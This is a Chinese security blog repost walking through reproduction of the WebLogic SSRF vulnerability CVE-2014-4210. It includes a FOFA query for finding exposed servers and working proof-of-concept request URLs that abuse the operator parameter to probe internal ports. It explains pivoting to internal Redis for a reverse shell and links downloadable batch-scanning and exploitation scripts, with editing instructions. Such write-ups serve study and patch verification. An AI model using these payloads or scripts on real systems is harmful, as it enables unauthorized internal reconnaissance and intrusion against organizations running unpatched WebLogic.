CVE-2014-4210 Weblogic SSRF漏洞复现

admin 2022年6月26日23:30:31评论590 views字数 1012阅读3分22秒阅读模式

漏洞环境

FOFAapp="Weblogic_interface_7001"

影响范围

10.0.2.0, 10.3.6.0

漏洞危害

探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。

漏洞复现

访问

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp

CVE-2014-4210 Weblogic SSRF漏洞复现

探测此ip存在的内网ip

CVE-2014-4210 Weblogic SSRF漏洞复现

poc

探测此ip存活端口

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:8001

CVE-2014-4210 Weblogic SSRF漏洞复现

此返回状态说明8001端口是开放的

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

CVE-2014-4210 Weblogic SSRF漏洞复现

此返回状态说明7001端口是关闭的

批量检测脚本

链接:https://pan.baidu.com/s/1OUcKcm-wBONMoC20AysCEw 提取码:9slm

下载脚本成功后,同目录下新建文件domain.txt内容格式如下,然后运行脚本即可

CVE-2014-4210 Weblogic SSRF漏洞复现

利用脚本

链接:https://pan.baidu.com/s/1K5zRzD2AtWIvIicTGUhJ4Q 提取码:9trc

下载完脚本之后有两处需要修改的地方

CVE-2014-4210 Weblogic SSRF漏洞复现

第一处:url改为你发现存在SSRFurl

第二处:ip地址这个是探测内网一个网段的可从上面信息搜集得到的ip段信息进行修改

另外如果要修改想要探测的端口直接在脚本里面修改即可

CVE-2014-4210 Weblogic SSRF漏洞复现

原文始发于微信公众号(赛瑞攻防实验室):CVE-2014-4210 Weblogic SSRF漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日23:30:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2014-4210 Weblogic SSRF漏洞复现http://cn-sec.com/archives/886727.html

发表评论

匿名网友 填写信息